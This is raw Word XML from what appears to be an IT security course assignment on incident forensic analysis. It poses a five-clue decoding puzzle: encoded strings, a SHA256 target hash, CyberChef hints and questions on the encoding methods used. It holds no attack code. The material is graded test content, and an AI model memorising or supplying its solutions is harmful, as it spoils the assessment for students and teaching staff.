                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D97903">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Chef settings</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C472DC2" w14:textId="77777777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Always use the decode option to reveal the next clue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01B358CD" w14:textId="0A96E335" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00D9790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 xml:space="preserve">When building the final combined recipe, apply the </w:t>
            </w:r>
            <w:r w:rsidR="00EC4653">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>clues</w:t>
            </w:r>
            <w:r w:rsidRPr="00D97903">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> in reverse order</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5862648C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51B831EB" w14:textId="77777777" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00D97903">
            <w:p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Success Criteria:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="225FD3CC" w14:textId="77777777" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00D9790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All five clues must be correctly deciphered</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514D0144" w14:textId="3634CC51" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00D97903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The final plaintext string must hash to</w:t>
            </w:r>
            <w:r w:rsidR="006F3ACE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Sha256)</w:t>
            </w:r>
            <w:r w:rsidR="00465A86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> to confirm it is the correct string</w:t>
            </w:r>
            <w:r w:rsidRPr="00D97903">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12366479" w14:textId="77777777" w:rsidR="00D97903" w:rsidRPr="00D97903" w:rsidRDefault="00D97903" w:rsidP="00EC4653">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D97903">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>2c8e847a1658bf74d5f5d024b52443e9b04932da50bf10be920dc870751a6580</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D4D24D0" w14:textId="77777777" w:rsidR="00EC4653" w:rsidRDefault="00EC4653" w:rsidP="00EC4653">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="635B96BC" w14:textId="57B22732" w:rsidR="00D97903" w:rsidRPr="00EC4653" w:rsidRDefault="00D97903" w:rsidP="00EC4653">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC4653">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Only once this is achieved will you receive the HD points</w:t>
            </w:r>
            <w:r w:rsidR="00EC4653">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> if the correct plain text is provided.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F6E7B5" w14:textId="77777777" w:rsidR="00D97903" w:rsidRDefault="00D97903" w:rsidP="00D97903">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C2F310D" w14:textId="30E5C461" w:rsidR="000E3718" w:rsidRDefault="3701973D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1: </w:t>
            </w:r>
            <w:r w:rsidR="13893790" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="7EC78E3B" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>heck the chain address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE7269D" w14:textId="21337470" w:rsidR="000E3718" w:rsidRDefault="0C781029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>Clue 2</w:t>
            </w:r>
            <w:r w:rsidR="009F771F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="4A461BBC" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>4W4KVvtSqbKifXbERtLzvraTL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46BF318A" w14:textId="69925EBA" w:rsidR="000E3718" w:rsidRDefault="739E8FB4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3: </w:t>
            </w:r>
            <w:r w:rsidR="13BFF919" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Tybony Uhagvat Birefvtug naq Fgengrtvp Gevntr Grnz, qebcg gur "U......", 0k1ON112P</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D780455" w14:textId="6E33B513" w:rsidR="000E3718" w:rsidRDefault="227EBFEA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4: </w:t>
            </w:r>
            <w:r w:rsidR="1310FEE8" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>97218f93de98bb9d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D2F85B" w14:textId="5136CE11" w:rsidR="000E3718" w:rsidRDefault="2556F2A7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Clue 5: </w:t>
            </w:r>
            <w:r w:rsidR="33F3DB19" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>763b8ec7efa4f2fa1429f1fe2d8b5645</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67043328" w14:textId="1DEF5A8C" w:rsidR="000E3718" w:rsidRDefault="2701A732" w:rsidP="04B97FC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Verifying </w:t>
            </w:r>
            <w:r w:rsidR="782156B5" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>clue 5</w:t>
            </w:r>
            <w:r w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>: Wmkip diqpsu glzvvgq, bvp ekl giezs xyi zwhv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ABDD1C1" w14:textId="228BD364" w:rsidR="000E3718" w:rsidRDefault="000E3718" w:rsidP="04B97FC6">
            <w:pPr>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4773DD83" w14:textId="56304305" w:rsidR="000E3718" w:rsidRDefault="34482CF5">
            <w:p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>ALL answers need to be completed to achieve the HD points.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E3718" w14:paraId="4C2AF078" w14:textId="77777777" w:rsidTr="7C159251">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B4193E1" w14:textId="6CEF57DB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lastRenderedPageBreak/>
              <w:t>Where is the clue located:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C9A01A" w14:textId="350A5BAE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>What type of entry/file is this in the context of where it is found?:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70160EA5" w14:textId="696BE412" w:rsidR="5DEBDC68" w:rsidRDefault="5DEBDC68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 xml:space="preserve">What is </w:t>
            </w:r>
            <w:r w:rsidR="5FD63FE5" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">ciphertext </w:t>
            </w:r>
            <w:r w:rsidR="001F43F6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>of the HD</w:t>
            </w:r>
            <w:r w:rsidR="00477346">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> plaintext</w:t>
            </w:r>
            <w:r w:rsidR="5FD63FE5" w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> for analysis: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF8145A" w14:textId="6B1979C7" w:rsidR="63179944" w:rsidRDefault="63179944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 w:rsidRPr="04B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">What is the hashing algorithm used to has the HD string (hint: Russian): </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FAB2645" w14:textId="4B61AF11" w:rsidR="02BCB752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 xml:space="preserve">What is clue 1’s method for encoding?: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FB596B2" w14:textId="7D860F0A" w:rsidR="02BCB752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4B97FC6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>What is clue 2’s method for encoding?:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B5261C" w14:textId="1AFBFA1B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What is clue 3’s method for encoding?:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C14410" w14:textId="4FB6A0DE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 xml:space="preserve">What is clue 4’s method for encoding?: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B770BE2" w14:textId="211C8D73" w:rsidR="02BCB752" w:rsidRPr="00465A86" w:rsidRDefault="02BCB752" w:rsidP="04B97F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 xml:space="preserve">What is clue 5’s method for encoding?: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="017FFC83" w14:textId="32352FCA" w:rsidR="006A5808" w:rsidRPr="00465A86" w:rsidRDefault="00477346" w:rsidP="00465A8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465A86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="4C140DB9" w:rsidRPr="00465A86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>laintext</w:t>
            </w:r>
            <w:r w:rsidR="5D0C0E35" w:rsidRPr="00465A86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21E1081B" w14:textId="1E89E081" w:rsidR="006A5808" w:rsidRPr="00465A86" w:rsidRDefault="006A5808" w:rsidP="04B97FC6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DF1B148" w14:textId="7501F0AF" w:rsidR="006A5808" w:rsidRPr="00534B4E" w:rsidRDefault="006A5808" w:rsidP="04B97FC6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FF60885" w14:textId="77777777" w:rsidR="000E3718" w:rsidRDefault="000E3718" w:rsidP="00CA0E31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000E3718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68AC" w14:textId="77777777" w:rsidR="004B2C18" w:rsidRDefault="004B2C18" w:rsidP="00E92820">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1C94E8B8" w14:textId="77777777" w:rsidR="004B2C18" w:rsidRDefault="004B2C18" w:rsidP="00E9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9B6F" w14:textId="77777777" w:rsidR="004B2C18" w:rsidRDefault="004B2C18" w:rsidP="00E92820">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="511D82C9" w14:textId="77777777" w:rsidR="004B2C18" w:rsidRDefault="004B2C18" w:rsidP="00E92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1C22" w14:textId="57270A6C" w:rsidR="0032289C" w:rsidRDefault="003228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C7AD2D" wp14:editId="082751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2082838001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C30B9" w14:textId="45A60C69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7AD2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Internal" style="position:absolute;margin-left:0;margin-top:0;width:60.05pt;height:30.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3BC30B9" w14:textId="45A60C69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5811C" w14:textId="3D2DDB12" w:rsidR="00E92820" w:rsidRPr="00E92820" w:rsidRDefault="0032289C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3A0BDF" wp14:editId="5D88A059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100675337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1B285" w14:textId="1C5A8A82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A0BD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1" type="#_x0000_t202" alt="Internal" style="position:absolute;margin-left:0;margin-top:0;width:60.05pt;height:30.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DF1B285" w14:textId="1C5A8A82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92820" w:rsidRPr="00E92820">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      </w:rPr>
      <w:t>COS30015 IT Security                              Incident Forensic Analysis                            Assignment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4ECF" w14:textId="0142859B" w:rsidR="0032289C" w:rsidRDefault="003228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0C2AC7" wp14:editId="2F1C86B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391160"/>
              <wp:effectExtent l="0" t="0" r="18415" b="8890"/>
              <wp:wrapNone/>
              <wp:docPr id="89080033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86357" w14:textId="7817ED53" w:rsidR="0032289C" w:rsidRPr="0032289C" w:rsidRDefault="0032289C" w:rsidP="0032289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2289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C2A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Internal" style="position:absolute;margin-left:0;margin-top:0;width:60.05pt;height:30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4486357" w14:textId="7817ED53" w:rsidR="0032289C" w:rsidRPr="0032289C" w:rsidRDefault="0032289C" w:rsidP="0032289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2289C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CD8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12F0E0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4D47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F07EAE3C"/>
    <w:lvl w:ilvl="0" w:tplc="A6BA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4A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AF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E9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C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9CC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09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666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F87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B37A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="447E1C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1251"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B388F5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A21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="447E1C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90C56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B9808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F25D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B29EC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F528D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49406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97266"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="959646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05939"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9EA6A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62226"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADAAC2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F0961"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12F240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91FEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D03C33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91012"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E86C2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8636D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADA64A6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D174A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="635E6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9B21B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19622C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757EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6F4EA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4119C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12F24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B40969"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A00AC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87386"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12F240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00DF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="959646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B339D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2C24C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76041">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1437214643">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="145050330">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1510482238">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1675644296">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1758286435">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1846822178">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1852573617">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1908221332">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1923685382">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2037464734">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="212548863">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="448399420">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="48304514">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="666251906">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="766657834">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="975574584">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1071657188">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1698003655">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="426190908">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1223252284">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1472554819">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="650865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CB"/>
    <w:rsid w:val="00012140"/>
    <w:rsid w:val="0006300A"/>
    <w:rsid w:val="00064F3F"/>
    <w:rsid w:val="000A202C"/>
    <w:rsid w:val="000A340B"/>
    <w:rsid w:val="000B3ED4"/>
    <w:rsid w:val="000B72D4"/>
    <w:rsid w:val="000D65BE"/>
    <w:rsid w:val="000E1955"/>
    <w:rsid w:val="000E3718"/>
    <w:rsid w:val="000E58FC"/>
    <w:rsid w:val="000F3243"/>
    <w:rsid w:val="00102B8B"/>
    <w:rsid w:val="00124DE4"/>
    <w:rsid w:val="00135C32"/>
    <w:rsid w:val="00141C57"/>
    <w:rsid w:val="00144BDD"/>
    <w:rsid w:val="00172CE5"/>
    <w:rsid w:val="00174B41"/>
    <w:rsid w:val="001831EE"/>
    <w:rsid w:val="00183D0B"/>
    <w:rsid w:val="0019621C"/>
    <w:rsid w:val="001A449A"/>
    <w:rsid w:val="001A6D41"/>
    <w:rsid w:val="001C2F4C"/>
    <w:rsid w:val="001C5DD3"/>
    <w:rsid w:val="001E31AD"/>
    <w:rsid w:val="001E4420"/>
    <w:rsid w:val="001F1BA2"/>
    <w:rsid w:val="001F43F6"/>
    <w:rsid w:val="00207763"/>
    <w:rsid w:val="00211D60"/>
    <w:rsid w:val="002222A8"/>
    <w:rsid w:val="00222F24"/>
    <w:rsid w:val="0023387A"/>
    <w:rsid w:val="002364CB"/>
    <w:rsid w:val="00243898"/>
    <w:rsid w:val="002479C4"/>
    <w:rsid w:val="00277F41"/>
    <w:rsid w:val="00294AC0"/>
    <w:rsid w:val="002B34B1"/>
    <w:rsid w:val="002B4E70"/>
    <w:rsid w:val="002C0057"/>
    <w:rsid w:val="002E022E"/>
    <w:rsid w:val="002F413F"/>
    <w:rsid w:val="003059F6"/>
    <w:rsid w:val="00307599"/>
    <w:rsid w:val="00320219"/>
    <w:rsid w:val="003209EC"/>
    <w:rsid w:val="0032289C"/>
    <w:rsid w:val="0033779F"/>
    <w:rsid w:val="00383686"/>
    <w:rsid w:val="00390FD7"/>
    <w:rsid w:val="00397599"/>
    <w:rsid w:val="003B0DB8"/>
    <w:rsid w:val="003B1205"/>
    <w:rsid w:val="003B4168"/>
    <w:rsid w:val="003D4945"/>
    <w:rsid w:val="003E08A9"/>
    <w:rsid w:val="00451AC8"/>
    <w:rsid w:val="00452634"/>
    <w:rsid w:val="00452E56"/>
    <w:rsid w:val="004574FD"/>
    <w:rsid w:val="00465A86"/>
    <w:rsid w:val="00473661"/>
    <w:rsid w:val="00477346"/>
    <w:rsid w:val="00490252"/>
    <w:rsid w:val="00492CEA"/>
    <w:rsid w:val="004A0D88"/>
    <w:rsid w:val="004B0E0A"/>
    <w:rsid w:val="004B1BAB"/>
    <w:rsid w:val="004B2C18"/>
    <w:rsid w:val="004C79BB"/>
    <w:rsid w:val="0051162F"/>
    <w:rsid w:val="00514036"/>
    <w:rsid w:val="00514558"/>
    <w:rsid w:val="0052502E"/>
    <w:rsid w:val="0053454A"/>
    <w:rsid w:val="00534B4E"/>
    <w:rsid w:val="00554A7A"/>
    <w:rsid w:val="005945B9"/>
    <w:rsid w:val="005949D9"/>
    <w:rsid w:val="005A0BED"/>
    <w:rsid w:val="005A1BEE"/>
    <w:rsid w:val="005D6B1E"/>
    <w:rsid w:val="005D70EE"/>
    <w:rsid w:val="005F192D"/>
    <w:rsid w:val="00640624"/>
    <w:rsid w:val="00643FFA"/>
    <w:rsid w:val="006609DD"/>
    <w:rsid w:val="00667CD1"/>
    <w:rsid w:val="00697897"/>
    <w:rsid w:val="006978AB"/>
    <w:rsid w:val="006A5808"/>
    <w:rsid w:val="006E3BCC"/>
    <w:rsid w:val="006E5480"/>
    <w:rsid w:val="006E6075"/>
    <w:rsid w:val="006F1176"/>
    <w:rsid w:val="006F3ACE"/>
    <w:rsid w:val="007016D7"/>
    <w:rsid w:val="0070454E"/>
    <w:rsid w:val="00707E37"/>
    <w:rsid w:val="00714B81"/>
    <w:rsid w:val="007464D8"/>
    <w:rsid w:val="00746934"/>
    <w:rsid w:val="00747C83"/>
    <w:rsid w:val="0075300F"/>
    <w:rsid w:val="007A5DE9"/>
    <w:rsid w:val="007C1254"/>
    <w:rsid w:val="007C4821"/>
    <w:rsid w:val="007E1E6A"/>
    <w:rsid w:val="00806723"/>
    <w:rsid w:val="00846688"/>
    <w:rsid w:val="008528FA"/>
    <w:rsid w:val="0085653B"/>
    <w:rsid w:val="008640AA"/>
    <w:rsid w:val="008A7103"/>
    <w:rsid w:val="008E5163"/>
    <w:rsid w:val="008F53EB"/>
    <w:rsid w:val="00903F7E"/>
    <w:rsid w:val="00904C2C"/>
    <w:rsid w:val="00913AAE"/>
    <w:rsid w:val="00915229"/>
    <w:rsid w:val="0093235B"/>
    <w:rsid w:val="00943681"/>
    <w:rsid w:val="00946E7B"/>
    <w:rsid w:val="009500DC"/>
    <w:rsid w:val="00960B13"/>
    <w:rsid w:val="0096642D"/>
    <w:rsid w:val="0097699D"/>
    <w:rsid w:val="009825F4"/>
    <w:rsid w:val="009B4881"/>
    <w:rsid w:val="009B7A76"/>
    <w:rsid w:val="009C2372"/>
    <w:rsid w:val="009C23FE"/>
    <w:rsid w:val="009D4FC1"/>
    <w:rsid w:val="009D767D"/>
    <w:rsid w:val="009F771F"/>
    <w:rsid w:val="00A035C4"/>
    <w:rsid w:val="00A07823"/>
    <w:rsid w:val="00A20230"/>
    <w:rsid w:val="00A22D03"/>
    <w:rsid w:val="00A4664C"/>
    <w:rsid w:val="00A545C2"/>
    <w:rsid w:val="00A71AED"/>
    <w:rsid w:val="00A73B84"/>
    <w:rsid w:val="00A917D9"/>
    <w:rsid w:val="00AB058D"/>
    <w:rsid w:val="00AE484F"/>
    <w:rsid w:val="00AF37D2"/>
    <w:rsid w:val="00AF60AE"/>
    <w:rsid w:val="00B127DE"/>
    <w:rsid w:val="00B13D3C"/>
    <w:rsid w:val="00B1431E"/>
    <w:rsid w:val="00B32240"/>
    <w:rsid w:val="00B350C1"/>
    <w:rsid w:val="00B73187"/>
    <w:rsid w:val="00B762B4"/>
    <w:rsid w:val="00B771DD"/>
    <w:rsid w:val="00B80424"/>
    <w:rsid w:val="00B9052A"/>
    <w:rsid w:val="00BA1DE7"/>
    <w:rsid w:val="00BB1FD5"/>
    <w:rsid w:val="00BC2628"/>
    <w:rsid w:val="00BE64F0"/>
    <w:rsid w:val="00BF1E64"/>
    <w:rsid w:val="00C46821"/>
    <w:rsid w:val="00C84765"/>
    <w:rsid w:val="00C93087"/>
    <w:rsid w:val="00CA0E31"/>
    <w:rsid w:val="00CC68B4"/>
    <w:rsid w:val="00CD4D79"/>
    <w:rsid w:val="00CE7EF5"/>
    <w:rsid w:val="00D17BCE"/>
    <w:rsid w:val="00D53D0C"/>
    <w:rsid w:val="00D844CD"/>
    <w:rsid w:val="00D97903"/>
    <w:rsid w:val="00DA0F94"/>
    <w:rsid w:val="00DA2F48"/>
    <w:rsid w:val="00DA3A43"/>
    <w:rsid w:val="00DB4CB3"/>
    <w:rsid w:val="00DE15BB"/>
    <w:rsid w:val="00E027DD"/>
    <w:rsid w:val="00E03B59"/>
    <w:rsid w:val="00E216E5"/>
    <w:rsid w:val="00E43902"/>
    <w:rsid w:val="00E92820"/>
    <w:rsid w:val="00E95A6E"/>
    <w:rsid w:val="00EC4653"/>
    <w:rsid w:val="00ED3318"/>
    <w:rsid w:val="00EE2876"/>
    <w:rsid w:val="00EE6C7E"/>
    <w:rsid w:val="00F25D12"/>
    <w:rsid w:val="00F44299"/>
    <w:rsid w:val="00F82B04"/>
    <w:rsid w:val="00F846D9"/>
    <w:rsid w:val="00F998D8"/>
    <w:rsid w:val="00FB55E2"/>
    <w:rsid w:val="00FB5BDA"/>
    <w:rsid w:val="00FB722E"/>
    <w:rsid w:val="00FC4967"/>
    <w:rsid w:val="00FC4F94"/>
    <w:rsid w:val="01707231"/>
    <w:rsid w:val="018F8D12"/>
    <w:rsid w:val="01E2B001"/>
    <w:rsid w:val="02269A58"/>
    <w:rsid w:val="023DFD83"/>
    <w:rsid w:val="027573DA"/>
    <w:rsid w:val="02BCB752"/>
